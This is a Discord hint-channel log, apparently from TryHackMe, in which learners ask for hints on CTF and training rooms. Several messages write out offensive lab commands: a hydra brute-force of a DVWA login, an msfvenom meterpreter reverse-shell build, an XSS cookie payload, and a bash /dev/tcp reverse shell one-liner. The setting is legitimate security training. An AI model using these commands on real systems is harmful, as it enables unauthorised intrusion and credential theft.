#room-hints

1 messages · Page 29 of 1

grand pivot
#

and im trying to get the shell

#

but i get that system cannot execute a blank command, when i want to write something

#

of course, with a blank space

#

already tried with %20

grand pivot
#

i get it

next glen
#

Hi guys, doing the advent of cyber christmas challenges, the one where you have to brute force using hydra

#

I've tried everything, can you confirm that the machine works as intended? thank you

stuck fractal
#

@next glen Web no

#

SSH yes

next glen
#

Web is broken?

stuck fractal
#

Same flags too

#

Give it a go

next glen
#

got it, thank you James

#

hey @stuck fractal , ssh might be broken too; just tried all the possible passwords

stuck fractal
#

It works for me

next glen
#

idk, I think it's probably this machine?

#

I wasn't able to solve the rdp challenge the other day until it got fixed

#

the one where you have to run the cert exploit

rose cape
#

can i get a nudge on c4ptur3-th3-fl4g
task 5, security through obscurity? struggling to find the file within the file. tried viewing metadata

stuck fractal
#

@next glen What's the IP?

next glen
#

10.10.11.240

stuck fractal
#

I'll give it a go and get back to you

next glen
#

thank you, appreciate it

#

also tried a different list other than rockyou, I still get lots of output

stuck fractal
#

On the web one?

#

Normally means you're not doing it right

next glen
#

no on the ssh one

#

I get 16 valid passwords for the web one

#

wouldn't wanna spoil anything, if I have, we can pm

stuck fractal
#

Did you kill the VM?

#

Gonna take that as a yes seeing as it's not up

next glen
#

Yes I did

stuck fractal
#

Can't check that easily then

next glen
#

can't you deploy it yourself?

stuck fractal
#

I can, but then it takes time to boot

next glen
#

something is wrong for sure

#

on this vm that I deployed, it's outputting way too many passwords

#

and I am certain that i'm using hydra correctly

stuck fractal
#

SSH works.

next glen
#

can I pm you for a second?

stuck fractal
#

And web still works.

#

I'll let you this time

next glen
#

let me what

stuck fractal
#

DM me

next glen
#

oh haha, it's not like I'm gonna make it my habit

#

anyways

lime patio
#

hi all, im trying to figure out what the answer to question #21 is in the BP: Splunk room. - Have been researching and the only option that is logical is "rename".. Any help?

#

rename is not the correct answer obviously 🙂

limber quarry
#

Anyone can help with The Impossible Challenge? I manage to decrypt the question but I still have no idea...

unkempt ore
#

hey i need a little help

#

my kali machine says msfvenom command not found

white salmon
#

I'm not sure what to put here. Can anyone help me? I thought it was root and Tryh4ckm3 ? It's probably a dumb question, but yea

stuck fractal
#

@white salmon terminate and redeploy

#

Bug is being fixed very soon

white salmon
#

I tried it twice. It loads the machine for a minute and in the end asks for credentials. Guess I should have not logged out of the machine in the first place. I'll just use PuTTY until the bug is fixed. Thank you!

winged drum
#

Guys i'm doing bpnetworking stuck at "Of these addresses two are reserved, what is the first addresses typically reserved as?" I can think of localhost, loopback and 10.0.0.0, done online research but not found exact answer

late patio
#

@winged drum keep looking. You're on the right track.

spark monolith
#

if anyone is done with Retro CTF please let me know i can pm? I had some doubts

late patio
#

@spark monolith What are you stuck on?

spark monolith
#

The exploit present in the recycle bin isn't working @late patio

late patio
#

I'm surprised that room is still running. lol..If you found the exploit there is a video you can watch that show's you how to do it...It works, It just has a bit of an attitude.

spark monolith
#

i have gone through one of the writeups but i am not able to understand that how they came to know about that cve ? that particular exe gave them direct admin shell

late patio
#

ah. look at the history...

#

@spark monolith You can dm me if you want.

white salmon
#

I have a problem with that too but i thought it should be that blobfingerguns

glacial ember
#

hey anyone has any hint for jigsaw room
the enumeration of the room give me no result i tried every scan tool i know

tidal sedge
#

@glacial ember There's a reason it's rated as insane, but here's a hint ||wireshark||

glacial ember
#

it didn't work

tidal sedge
#

Please remove the spoiler or put it in spoiler tags and simply

#

And I advise against looking at writeups without solving the box first, it ruins the fun. 🙂

glacial ember
#

yeah but when you stuck and you don't know what are looking for exactly ...

#

@tidal sedge and there is a same room on vulnhub

tidal sedge
#

It was imported from VulnHub

#

The author is a mod on this server.

faint trail
#

Just re-did alfred but without using metasploit, fun

ripe hedge
#

For the scripting challenge, Task 2, I'm assuming there's a defined start port? The question is not entirely clear on that matter

tidal sedge
#

@ripe hedge You start with port 1337.

ripe hedge
#

Ok, so there is a dedicated start port ok

#

the starting point given is 3010

#

and it wasn't clear that the sequence was fixed

tidal sedge
#

I don't remember this challenge well, but I have no idea why it says that 🤷

#

Let me check the writeups real quick

ripe hedge
#

magic?

past night
#

loool jigsaw kekw

ripe hedge
#

the writeups assume 1337

past night
#

good luck spotting the initial vector

ripe hedge
#

but I'm trying to robustify the flimsy python

tidal sedge
#

Yeah, Jigsaw was fun

past night
#

yeah, the room itself is darn hard

rotund arrow
#

Hi can someone please give me a very small hint regarding the bonus challenge in the learn linux room?

velvet wharf
#

when do you recommend using find / -xdev vs just find / ??

ripe hedge
#

oh. dividing by 0 is a bad idea...

#

I think I overkilled the task though

tidal sedge
glossy basin
#

takes a lot

#

IIRC it was ~13%

#

I have left it running in THM kali at that time

tidal sedge
#

@glossy basin Alright, thanks 🙂

ripe hedge
#

hmm...the Hard problem in the Scripting room feels easier than the Medium problem...

flat jacinth
#

Hello, can some1 give me a hand in room https://tryhackme.com/room/theimpossiblechallenge
Dont really know how to start :/

blazing turtle
#

i've heard decrypting the hint is a good place to start, but i haven't really looked at it myself

flat jacinth
#

aww thought so, but im not coming with anything with this letters mess xD

inland onyx
#

You can do that bit in Cyberchef

peak girder
#

@inland onyx don't know if I would recommend Cyberchef to new 'learners'... it's a great tool but skips a few basic lessons that are valuable 🙂

ripe hedge
#

Wonder if cyberchef has a docker image

peak girder
ripe hedge
#

Yeah ok there are several

stuck fractal
#

@ripe hedge It's a static HTML/CSS/JS page

#

You can just open the file, or get a webserver for docker

ripe hedge
#

Looked like node from the source

peak girder
#

doesn't matter.. install node.. run it with node.. and you'll have it locally

#

but I would prefer a docker image tbf 🙂

ripe hedge
#

Ok it webpacks it

#

So yeah it can probably live in an nginx

#

Oh haven't seen grunt in a while though

peak girder
#

hmm grunt.... * grunts *

ripe hedge
#

Firefox doesn't like serving JS from file:// anymore

peak girder
#

try chrome?... maybe safari? chromium? brave? internet explorer?

#

lol

ripe hedge
#

Yeah not ie :p

peak girder
#

😉

ripe hedge
#

Not a fan of Chrome's devtools

#

The network stuff is a bit wonky compares to firefox

#

FF also has better CSS tools imo

peak girder
#

depends what you're used to... I use brave (which is just kinda a chrome clone) always for the network devtools

ripe hedge
#

To each their tools

peak girder
#

but yeah.. isn't there a setting in FF to turn that off? maybe look for that on the webs

ripe hedge
#

Probably but it's also good practice to leave the cors bits on

peak girder
#

well everything for research right? 😉

ripe hedge
#

:)

peak girder
#

but yeah.. else just take the docker.. or build your own dockerfile

ripe hedge
#

It's not hard to spin up an nginx anyways

#

And compose helps

peak girder
#

(that why i'd use a docker.. even faster, no nginx needed)

#

no extra tools at all.. tbf

ripe hedge
#

Nginx docker image I meant

#

I like docker compose because I can never remember the cli arguments to run the thing

peak girder
#

well.. that's a flaw.. you should fix that 😉 😛

ripe hedge
#

Can always spin up a k8s

#

Might be overkill though

peak girder
#

... dude.. overkill much

inland onyx
#

Keep it PG13 guys 🙂

ripe hedge
#

Ok, agreed that k8s is a crime against humanity

peak girder
#

nah.. it depends where you use it for.. for yourself? yes.. overkill.. for a company that has a lot of services and isn't monilithical.. it's ok to use

ripe hedge
#

I jest of course

white salmon
#

“What is Google's top service across all their devices on this ASN?” There is no services listed on Ultratools ANS listings for Google

stuck fractal
#

@white salmon You're doing the shodan room

#

Use shodan

ripe hedge
#

That seems obvious

white salmon
#

Maybe it can’t be done on mobile

stuck fractal
#

@white salmon Use shodan.

white salmon
#

I know thank you, I just can’t seem to get to the right path on mobil, i’ll finish when I get to my desktop

tidal sedge
#

@glossy basin I finally managed to find the password after 4-5 hours of cracking 🙂

glossy basin
#

nice!!

stuck fractal
#

@tidal sedge For the steg room?

#

I think it needs to be made private

tidal sedge
white salmon
#

maybe add a hint with the first letter of the password

tidal sedge
#

The bruteforce in this reminded me of HTB's Smasher 2 😨 , through I think they removed the bruteforce part later

white salmon
#

hello, o just end the basic linux room, and i want to you guys tell to me what rooms do, im very confused and i dont know with what start, kali linux? blue?,,, someone else?

tidal sedge
white salmon
#

thx

cloud perch
#

So I'm doing the post exploitation basic I'm following along the steps so once I get to using the power view.ps1 and run it. I get errors. Like it doesn't want run and I'm doing exactly as the guide is telling me to do. I even did the powershell -ep bypass. What am I doing wrong. I've used powershell scripts before and I can't figure out

storm aspen
#

Can you post the log?

cloud perch
#

Yeah give me a sec

storm aspen
viral mason
#

hey james, can you give a hint for this question on wifihacking101? @stuck fractal

stuck fractal
#

@viral mason It's a part of the aircrack suite

#

Read some guides on how to use the tools packaged in there

solemn smelt
#

look at the documentation its not hidden

viral mason
#

ok thx

stuck fractal
viral mason
#

thanks man

stuck fractal
#

Added it as a hint on the question

viral mason
#

yup, completed the room, it was a nice ride thanks @stuck fractal

stuck fractal
#

Now give it a go yourself

viral mason
#

sure i will

white salmon
#

Have logged into Shodan and searched for “What is Google’s top service across all their devices on this ASN?” There doesn’t seem to be any three letter acronym or word answer

last nova
#

try SSH

white salmon
#

I haven’t learned SSH but i’ll see what I can do with the IP if that’s how it works

last nova
#

basically, its asking what service i.e. protocol (http, https, dns, ftp, ssh, telnet, etc) is the most common acrossed the specific Autonomous System iirc

white salmon
#

I tried those when they appeared on Shodan, tcp, udp, dns but i’ll try the others, I guess it just wasn’t obvious enough for me 🙈

#

Thanks, thought it was looking for something like GCP - Google Cloud Platform as their “Service”

#

I wish it said protocol instead of service, that would have saved a lot of time lol

stuck fractal
#

@white salmon HTTP, DNS, FTP etc are services.

last nova
#

two out of the three have protocol in their name sumN

#

hypertext transfer protocol, file transfer protocol, domain name service

stuck fractal
#

Spooks

#

You know exactly what the distinction is

last nova
#

I do, but theyre protocols

last nova
#

that whole page has protocols written all over it sumN sumS sumE sumW

stuck fractal
#

And also service

last nova
#

word statistics

#

protocol occurs 45 times

stuck fractal
#

That's because the page is about protocols

last nova
#

service occurs 14

white salmon
#

I just never learned them with the term “Service” involved, i’m studying the A+ so I have only known them briefly as protocols, the port numbers for them and what they do

stuck fractal
#

nmap -sV

crystal aurora
#

how do i start entering text into a new vim document ? anyone

white salmon
#

has anyone completed the HA Joker CTF?

patent token
#

man vim devprogramming

stuck fractal
#

@white salmon The images often don't show up properly

#

Reexploit.

white salmon
#

@stuck fractal Images are loading

#

But idk how to upload the rev shell

desert bramble
#

Morning, wondering if someone could offer a hint to task 5 Q1 of the xss playground. I get how to make an alert on the mouseover. im just not sure what it wants me to do with cookies?

I tried test" onmouseover="alert(Document.cookies)"

It just returned undefined

#

Nevermind, as i was rereading my post on here i noticed i had a caps on Documents. That seemed to fix it

latent sorrel
#

Hello, is anyone facing issues in the task 7 11th question of the room "Network Services" created by PoloMints.
I am not able to get the reverse shell

echo thunder
#

anyone completed the Bookface room?

#

I can't the password as is not in the fasttrack dictionary

#

can anyone give me a hint on the dictionary to use?

#

it seems that on port 22 is refusing the connection

pine lodge
#

can somone give me a hand on steel mountain? ive made a service exe, overwritten the existing one (using windows/shell/reverse_tcp) the service doesn't do the 1053 error, and hangs in start_pending, but doesnt throw me a shell back?

#

im listening on 8080

mild eagle
#

any hints on how to see func addresse in task 7 in Buffer overflows ?

#

tried via r2

#

but my r2 skills failed 😦

wraith marsh
#

Do the radare room?

craggy pulsar
#

bookface has always had that problem iirc

#

i think Ninja/james found it in rockyou at some point

#

the password is in fasttrack but for some reason it doesnt work if i remember correctly

mild eagle
#

@wraith marsh did that but I don’t see how I get the func address still

wraith marsh
#

user r2 to print the list of functions, it has the address next to it

mild eagle
#

yes and that is my question howto do 🙂

wraith marsh
#

If you had done the Radare2 room you would know

#

its in there

#

Ima have to say TryHarder on that

mild eagle
#

okay i will go back an revisist

mild eagle
#

okay got it what is know the bast way to calculate the payload or rather how to overflow to a specififc adress ?

wraith marsh
#

with a cyclical pattern generator

stuck fractal
#

Also

#

Remember running a binary inside a debugger will use different offsets

mild eagle
#

Yes i just a Way or a pointer On how to proceed

stuck fractal
#

What room?

wraith marsh
#

hes doing bof1

#

task 7

stuck fractal
#

Probably chuck it in a debugger and see what you can do

#

If you're overflowing a buffer where the binary is doing a strcpy or similar, you can get the address of the start of the buffer using ltrace

wraith marsh
#

Task 7 is overwriting a function pointer IIRC

mild eagle
#

Yes

green frost
#

Hey all, I'm having issues with 2 questions in the Splunk room and could use a nudge.

#

Specifically Task 2, questions 21 and 23. I know the answer for 21, but it refuses to accept it.

echo thunder
#

Hey all, I'm having issues answering question 6 on task 2 for the lord of root challenge

#

can anyone help me please

#

?

#

nevermind added 2 spaces and not one

spark monolith
#

Hey, can anyone give me help on ctf 100 room . I'm stuck on stage 5 task 12th , after Flag 71.

torn mural
#

Am I just a dummy, or is django supposed to be giving me such a hard time with starting an app?
I am dumb. I got it.

white salmon
#

How do I add tags

inland onyx
#

Verify with the bot

#

It should have sent you a message

white salmon
#

Thanks

white salmon
stuck fractal
#

@white salmon wrong username

white salmon
#

i found only john and james

#

i tried johncactus and many others

stuck fractal
#

You're assuming the username is a first name

#

You haven't tried the right one

white salmon
#

so this is no john or james from this message inside?

stuck fractal
#

You've assumed the format of the username

#

firstname or firstlast

#

Try other formats

white salmon
#

ok thank you @stuck fractal i got it 🙂

mild eagle
#

in room ccradare2 any hint ont the final questions ?

patent sentinel
#

for the life of me I can't tell the different between the 2 different login with the phishinghidden I room what am I missing

sharp mason
#

I'm trying to brute force a simple login.asp page. I've successfully used hydra in the past where the previous exercises were http-post and I was able to see a failure message that I could feed to hyrda. In this case it's an http-get type login and there isn't a failure message that renders in the browser on a failed login attempt. The only reason I can tell it failed is because of the 302 response code. I think hydra requires either a success or failure string as the third http-<method> arg so I was wondering if there's any way to specify the http response code instead. Anyone else run into this?
hydra -l admin -P <password_list> <ip> http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
^^thats the syntax I'm used to for POST forms where there's a failed login message of "Login failed"
just wondering if there's any workaround if there's no success or failure message

ripe hedge
#

You can try to use something on the login page, assuming it redirects there

graceful sun
#

i been working on this for a long time and i just gotta ask for help now ... even with all the walk throughs i follow step by step perfectly i cant get my shell uploaded im getting this error on DogCat when trying to send the shell.php from burp this is the error i see in the log file_get_contents(http://10.8.10.142/shell.php): failed to open stream: Connection refused in <b>/var/log/apache2/access.log

dusky zephyr
#

in basic pentesting when i use hydra to find the pass i try with ssh port and will take 2 hours to find with a normal wordlists

stuck fractal
#

@dusky zephyr No

#

It predicts 2 hours

#

It could be sooner

#

Much much sooner

#

have you considered trying it out first? @dusky zephyr

dusky zephyr
#

hm i am trying now i use john wordlist threads 4

stuck fractal
#

Hydra and John have very different purposes

#

If you don't know the difference or what each does, you should really find out.

dusky zephyr
#

any other wordlist which i could use.

solemn smelt
#

rockyou

dusky zephyr
#

@solemn smelt thanks

white salmon
#

am I missing something with the SQLi labs

#

there's not a lot of info

#

am I supposed to be proficient with SQL injections before doing the SQLi labs room

frail hull
#

Hi there, I dont find the zip file mentioned in Agent Sudo task 3 #2 , who could give a hint?

glossy basin
#

@white salmon yes, SQLi labs is not teaching anything

#

but a SQLi teaching room is coming soon

white salmon
#

ok cool

#

do you happen to know of a good beginner resource

#

I got stuck on the OWASP juice shop and went looking for SQLi lessons

still fiber
#

Got stuck at django ctf hidden flag. Any hints please?

white salmon
#

im on task 5 of the OWASP juice shop, trying to find more info on Jim so I can reset his pw

#

I've tried escaping the product search query like q=juice' order by 1-- and I tried similar in the product comments

thorn finch
#

Hi guys iam bussy with introresearch question
#5
If a password hash starts with $6$, what format is it (Unix variant)?

#

I know it its sha-512

#

But what do they mean with format ? i think that iam searching way to deep in sha-512

#

Because iam currently looking in how the algorithm is build..

ripe hedge
#

@white salmon "He's dead, Jim"

#

Figure out which famous Jim he is, the rest is osint

#

@thorn finch assuming you're trying to crack it with hashcat, check the help

graceful sun
#

||king@ubuntu:~$ ps aux | grep openvpn
king 886 0.0 0.2 14224 1020 pts/0 S+ 06:04 0:00 grep --color=auto openvpn
this is sopposed to be running a root cron job and its not so i cant get root.... its on LaxCTF||

ripe hedge
#

Process owner is the user, so...

graceful sun
#

nvm i got it now

white salmon
#

Hello all. Do you know how to enumerate telnet users?

#

I cant find it in google.

steel fulcrum
#

Hi, does anyone complete RP : Nessus on Window platform ?
https://tryhackme.com/room/rpnessus
I got an issue on [Task 4] scanning result
This is my final Nessus scanning result, which is a lot different from the actual scanning result. Someone said that I am not performing full scan. Does anyone know how to perform it ? I have done all the settings given in the room btw

white salmon
#

do you have a set up all the ports and scripts?

steel fulcrum
#

@white salmon what do you mean the setup the scripts ?

white salmon
#

sorry "plugins"

#

it is not a nmap 🙂

steel fulcrum
#

I have enable the scan type to all the ports btw

white salmon
#

looks ok

fallen dragon
#

I am stuck at Anthem's reverse shell wherein I am trying to download the nishang PS reverse TCP and its getting detected by antivirus...any hint to bypass it?

white salmon
#

I'm doing the Ignite Room but not getting reverse shell. I tried two different writeup but still not getting. Any idea why it's happening?

night cave
#

Is this some kind of command injection?

little tapir
#

can someone help me with the final exam question on the cc: radare2 room?

#

all the other questions and examples were easy

#

but im lost on the final one

patent jacinth
#

Hi guys, I am trying to read a file on the FTP section of network services

#

! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send

#

I have to choose from these commands, any ideas?

stuck fractal
#

download with get

patent jacinth
#

thanks. I think the machine dropped, which is why it won't work 😅

ripe hedge
#

that'll usually be a good cause

noble tinsel
#

in Windows PrivEsc Arena task 1, im trying to avoid metasploit so Im listening for the reverse shell with nc. it has shown that it is connected but no output. I used the command msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.64.30 lport=4444 -f exe -o program.exe R and fetched it from a webserver...can anyone provide a hint please

stuck fractal
#

@noble tinsel You have a meterpreter payload.

noble tinsel
#

yeah i just realized

stuck fractal
#

That's the opposite of avoiding metasploit

noble tinsel
#

thank you

pulsar oar
#

Hey all, I am experimenting with DVWA brute force on the high security. I have a python script using the requests & bs4. My big issue is after I grab the "user_token" and then pass it in as a portion of the data, the html that gets returned shows no difference between a correct authentication combo and an incorrect one. Any ideas on why this is?

jolly mantle
#

can someone help me with the final exam question on the cc: radare2 room?
@little tapir still stuck?

ripe hedge
#

so.. on the Basic Pentest box, is ||K's ssh key|| actually used?

#

couldn't get the password to work

stuck fractal
#

@ripe hedge it was for me

ripe hedge
#

ok... I abused an suid root program to read the files...

#

ah I see.. did not know how to crack the key password

#

thank you google

white salmon
#

anyone got a hint for the final question for linux walk through?

#

i've discovered nootnoot has sudo privileges, and went to their home dir but couldnt see anything more

stuck fractal
#

@white salmon Maybe look for files belonging to all users, you might be able to gain access to nootnoot

white salmon
#

i noticed the .sudo_if_admin_successful thing

#

that's a lot of files :|

#

shall look

#

is it something that should stick out, like really out of place - or is it more covert than that

stuck fractal
#

Fairly overt

white salmon
#

ok, shall look

#

note to self: dont do this at 3am

#

brain no work

#

im stuck - i found my way into ||/run/ where there's some interesting files like "sudo" (apparently an executable directory???)|| but im stuck from here

stuck fractal
#

@white salmon ||belonging to shiba2||

white salmon
#

hmm

#

is it anything to do with ||the tmp dir? i see tmux-1001||

#

im also guessing i can ||ignore /proc and /sys?||

stuck fractal
#

Yes you can ignore that

white salmon
#

is there a way i can remove ||proc and sys|| from my results? they're bloody annoying

stuck fractal
#

Instead of find /, you could find in each directory

white salmon
#

could you elaborate on that?

#

not sure what you mean

#

i did ||find / -user shiba2|| to get everything by them

#

and then i piped it to an output file, winscp'd it to my desktop and removed all mentions of ||/proc and /sys||

stuck fractal
#

so find /etc

#

find /home

white salmon
#

hmm ight

#

@stuck fractal i cracked it

#

i cannot believe it took me THAT long to see something THAT obvious

#

i cry

#

thanks

stuck fractal
#

It takes everyone a while

#

The more you know, the longer it takes

crystal aurora
#

Which image shows a legit web-page? Anyone

frank dirge
#

Stuck in Extreme Obf challenge in JVM Reverse Engineering room.
I extracted the required code from the decompiler and use them to create a same java file that would print out all the strings. But all the strings come out with Japanese characters in b/w them

indigo ridge
#

https://tryhackme.com/room/theimpossiblechallenge# I need some hint on this.. Task1

north saffron
#

||Spoiler Test||

hasty slate
#

did u decode the hint? @indigo ridge

heavy stump
#

can i ask for help here?

#

i think i did everything right but not sure

stuck fractal
#

@heavy stump This chat is for hints not help

drowsy blaze
#

I sort of need a hint/clarification on what a task is asking of me.
I'm doing the Linux Challenges room and this is on Task 4, question 7.
Im unsure on if it's asking me to to basically list all files on the machine to find a file that starts with the name of "4bceb", or if it's asking me to find a file that has the string that begings with "4bceb"

ripe hedge
#

the latter

#

though you can try both 🙂

stuck fractal
#

@drowsy blaze The flag starts with those chars. Find the flag

drowsy blaze
#

cool thanks!

mild eagle
#

Any hints on Radare2 room the final exam ?

plucky steppe
#

@mild eagle I am about to start that task, I will let you know if I can figure it out

remote leaf
#

About when Lola started her photography, I'm not so sure it isn't glitchy. Without giving too much away , I did read the blog page and can see where she literally mentions that it's been "X" date since she started, yet entering that date is regarded as a wrong answer. Since it's just that obvious, I'm not so sure it isn't glitched. Just saying -- on the other hand - I LOVE this exercise as it's about getting info on the user - it's surpring how much info people leave on online!

stuck fractal
#

@remote leaf You need to do some maths

#

The ||page you're looking at is a snapshot in time||

remote leaf
#

I'm aware I have to do math. She's literally saying she started Y years from X date which is shown on the webpage, it's basic math. 🙂

stuck fractal
#

@remote leaf Read the question carefully, you're told how to format the date

remote leaf
#

Sorry about rule 1 earlier.. I didn't read it before. I did now. I understand what you're telling me. Sneaky, boss!

stuck fractal
#

@remote leaf Not sneaky, THM is a british company. Read the damn questions

white salmon
#

so for a room i am in, it wants me to nmap, i can do this still if im on a kali vm even if the vm isnt connected to the openvpn?

stuck fractal
#

Connect the VM to the OpenVPN. Don't connect from the host

white salmon
#

so i have to get openvpn for my vm, got it

#

thanks

stuck fractal
#

Kali comes with it installed @white salmon

white salmon
#

oh okay

#

Greetings, I have a basic question which I don't know how to solve, perhaps someone can give me an insight.
I was doing the Basic Pentesting and I needed to use John to crack the RSA Private Key after making it read only.
My issue however is that while using John w/ RockYou.txt, instead of the solution it gives me and output with <?> symbols.

I went to the extend of checking the Writeups and following it, but the reason still persists.
Thank you for your time in case you end up reading it.

#

I'm working on CTF 100, and I don't know what cipher comes to mind with this string.

#

The second flag haha

#

Wait nevermind it's rot13

stuck fractal
#

@white salmon It'd be a lot easier to help if you posted screenshots

white salmon
#

Sorry for the quality, couldn't print screen, not using discord on the laptop momentarily.

stuck fractal
#

@white salmon Ok, look at the file you're giving john

#

.gz

#

that's compressed

#

you need to decompress it

white salmon
#

Any command in particular to decompress? I'm new to this, but willing to learn.
And thank you for your help.

stuck fractal
#

gunzip

white salmon
#

Thank you it worked!

#

The issue was indeed what you told me.

#

@stuck fractal I really appreciated your help. Thank you once again!

stuck fractal
odd nebula
#

ctfcollectionvol2 - maybe above my knowledge level, but currently stuck at easter egg4. have tried to throw what little i know at it. tried sqlmap a bunch of times. i think i have approached the blind time based sql with it in a few ways, but nothing came back with.
sqlmap -u 10.10.7.219/index.php? --technique=t --time-sec=3 --forms --crawl=2 --level=3 --risk=3
nothing coming back.
any suggetions to get more info on better use of sqlmap or maybe a tip👍

white salmon
#

I'll look at it

#

@steady rampart I'll see what I can pick at when I get to it. Seems interesting.

tribal ginkgo
#

hey everybody

#

has anyone done this room

#

if yes could you please help me how you crack this hash

#

11FE61CE0639AC2A1E815D62D7DEEC53

mild eagle
#

@plucky steppe in the. Last task before the final exam did you see the msg I could see it was suppose to print out ie. I’ve changed the value, but no output was shown on screen

hasty slate
#

@tribal ginkgo googling is your only option, using the sites like md5hashing, md5decrypt etc..

tribal ginkgo
#

@hasty slate I tried there didn't get there anything

hasty slate
#

yeah lol.. maybe use a writeup.. I didn't find that hash either in any of those sites.

#

it is not bruteforcable

tribal ginkgo
#

@hasty slate i saw the writeup there was direct answer given no way to find out how they get it

shrewd verge
#

ermmm maybe need to hashcat/john

#

did u find the hash type?

#

@tribal ginkgo

tribal ginkgo
#

yes i used hash-identifier

#

its says md5, or ntlm

#

its not md5

#

its ntlm

#

@shrewd verge

shrewd verge
#

yea ntlm.. due to the hints given

tribal ginkgo
#

yes

#

tried hashcat with rockyou

#

didn't get anything

#

I know the answer due to writeup , but

#

how do we get there

shrewd verge
#

yea i saw the same writeup... still figuring the same.. how he get the plaintext.. maybe need bruteforce?

tribal ginkgo
#

if that long you try to brute force in hashcat it gave you interger out of length

shrewd verge
tribal ginkgo
#

what length did you give

#

i should be bigger than this

shrewd verge
#

well didnot give length but i give the -m 1000 (ntlm) -a 3 (bruteforce)

tribal ginkgo
#

yeah its using 7 length but as you already know the answer is pretty big

shrewd verge
#

XD room of patient

elder bloom
shrewd verge
#

what kind of help?

#

@elder bloom

elder bloom
#

@shrewd verge with task 4 question 1

#

shodan gives result with answer with different format.

shrewd verge
#

well its either the question ASN you use is not same as the question.. i did found a few ASN for google

#

which give different answer

elder bloom
#

i will try with other ASN's

shrewd verge
#

try the one on the example.. n the one from you google

elder bloom
#

i am using ||AS15169||

shrewd verge
#

what did u get for the answer?

elder bloom
#

||Windows Server 2008||

shrewd verge
#

that corrrect answer.. did u submitted?

elder bloom
#

yes

#

it is saying incorrect

shrewd verge
#

😆 that weird.. i submit n its correct..

elder bloom
#

now it is accepting

#

i dont know what was the problem Xd

#

anyways thanks👍

glossy basin
#

because the answer was fixed

#

(to the right one)

elder bloom
#

who dos that and how?

glossy basin
#

the room creator fixed it

#

basically, the operating system changed since the room was created

#

so this why it should have been changed

elder bloom
#

and here i was thinking there is something wrong with me

shrewd verge
#

any hints on dogcat? .. i did found only on the php filter lfi

#

ahhh i got it

#

😆 👍 1st flag

inland onyx
#

Uh, that looks like it is a flag

#

(On which note, mind editing it out @white salmon?)

white salmon
#

I tried using it.

#

It didn't work.

inland onyx
#

Which question is it exactly?

white salmon
#

Easter 4 on ctfcollectionvol2

inland onyx
#

Ah, in that case no it is not the answer 🙂

#

Use the hint

white salmon
#

Oh well. Skip the easter eggs for now.

#

I've tried for quite some time

shell sun
#

how can I scan ports for files with nmap?

stuck fractal
#

You don't?

shell sun
#

But in the room „Advent of Cyber“ Day 7, last task, I have to do this

stuck fractal
#

No, you don't.@shell sun

#

You found something running, interact with it.

shell sun
#

How?

oblique cliff
#

look up the process thats running on google and how to interact with it @shell sun

shell sun
#

Lol, thank you. I didnt know, that you can do this

plucky steppe
#

@mild eagle hey sorry for the late reply I could not figure out the last question on Task10

mild eagle
#

@plucky steppe just solved it see in community hell my replies to forser he is also struggling

plucky steppe
#

@mild eagle Yeah I am actually reading them now haha

eager flax
#

Hello all,
i'm trying to decrypt a file (not related to a room)
Any tool suggestion?

white salmon
#

Greetings, I'm doing the Anonymous v6 Room & I am stuck.
I need to create a reverse shell and import it trough ftp.

My questions:
• What IP & Port do I use as my own inside the .bash.sh [The virtual Ip Adress provided by TryHackMe?]
• When I try put directory/bash.sh to import I get disconnected by the ftp connection

I've never created a reverse shell, I appreciate the help.

stuck fractal
#

You should always be using your VPN IP address

#

The target can't talk to you with any other address

white salmon
#

As the reverse shell command I wanted to use: bash -i >& /dev/tcp/<ip>/<port?> 0>&1 but I don't even know how to make it work or upload to the ftp target without getting disconnected. Any hints?

stuck fractal
#

I recommend doing other rooms first and learning how reverse shells work and how FTP works

white salmon
#

Thank you, please let me know if you recommend any of the rooms.

stuck fractal
#

Check the pins in #general for a guide on the order to do rooms @white salmon

fiery garden
#

Regarding Intro to x86-64, I'm having trouble getting the answer to "If Statements Continued #1".. I set a break point immediately before the retq and pop instructions, but the answer is being shown as wrong

#

Anyone have any hints?

#

It'd be much appreciated 😄

plucky steppe
#

what did you put for the answer @fiery garden

fiery garden
#

63

plucky steppe
#

@fiery garden is that the value for var_8?

#

I know for one of the questions you have to convert it from ||hex to decimal||

fiery garden
#

I'm setting a break point at 0x5562f623c637 and checking the value 'px @rbp-0x8' - Am I reading the output wrong?

plucky steppe
#

@fiery garden yeah I got a different answer you are close though but its not 63

#

are you using the binary if2?

fiery garden
#

Yeah

#

I've tried a few different answers that didn't work

#

Like 60

plucky steppe
#

that ||60 value is hex|| @fiery garden

fiery garden
#

Thanks for your help. So are all of these values typically in hexadecimal?

plucky steppe
#

not always

fiery garden
#

The other answers didn't need to be converted so I imagine their hexadecimal values were the same as their decimal values

plucky steppe
#

yeah

#

until you get to 10 which will be a in hex

fiery garden
#

Alright gotcha. Thanks again! I should have better read the note on the page, "The value stored in memory is stored as hex."

white salmon
#

What do I do with crontabs hint i’ve been stuck in it for like 2 hours

#

I see all users get x permissions but I still can’t use sudo in the correct directory ; /

stuck fractal
#

@white salmon What?

#

Whatever you're saying, it doesn't make sense

white salmon
#

In Linux Ctf my hint for flag 4 is crontabs, I saw the usr/bin/sudo is r-x for my group but sudo doesnt work to get in crontabs for flag

stuck fractal
#

That just means you can run the sudo program

#

That doesn't mean you can actually run commands using sudo

#

You need to actually look where crontabs are stored or created

white salmon
#

I found crontabs I just don’t know what to do once I find it

#

I’ve tried cat with sudo ./ and ~/ etc or cd etc

#

Just says bob is not in sudoers file, this incident will be reported

stuck fractal
#

Have you considered that you're just fumbling and throwing sudo at stuff when you're met with a problem?

#

Because you really shouldn't just use sudo if something doesn't work

white salmon
#

Yes i’m a novice throwing stuff at it that I think might work

stuck fractal
#

Don't throw sudo at problems.

white salmon
#

And it hasn’t been working

stuck fractal
#

@white salmon Look at how to view your user's crontab

#

For bob.

white salmon
#

K

#

Hah man 🙈 then I found the flag thanks

ripe rock
#

Hello there again i have few issues in intro X86_64 challenge

#

i dont understantd this question task 4:
What is the value of var_8h before the popq and ret instructions?

grand pivot
#

what is the issue with that question?

ripe rock
#

that the value that i am getting is 63

#

and its saids is wrong

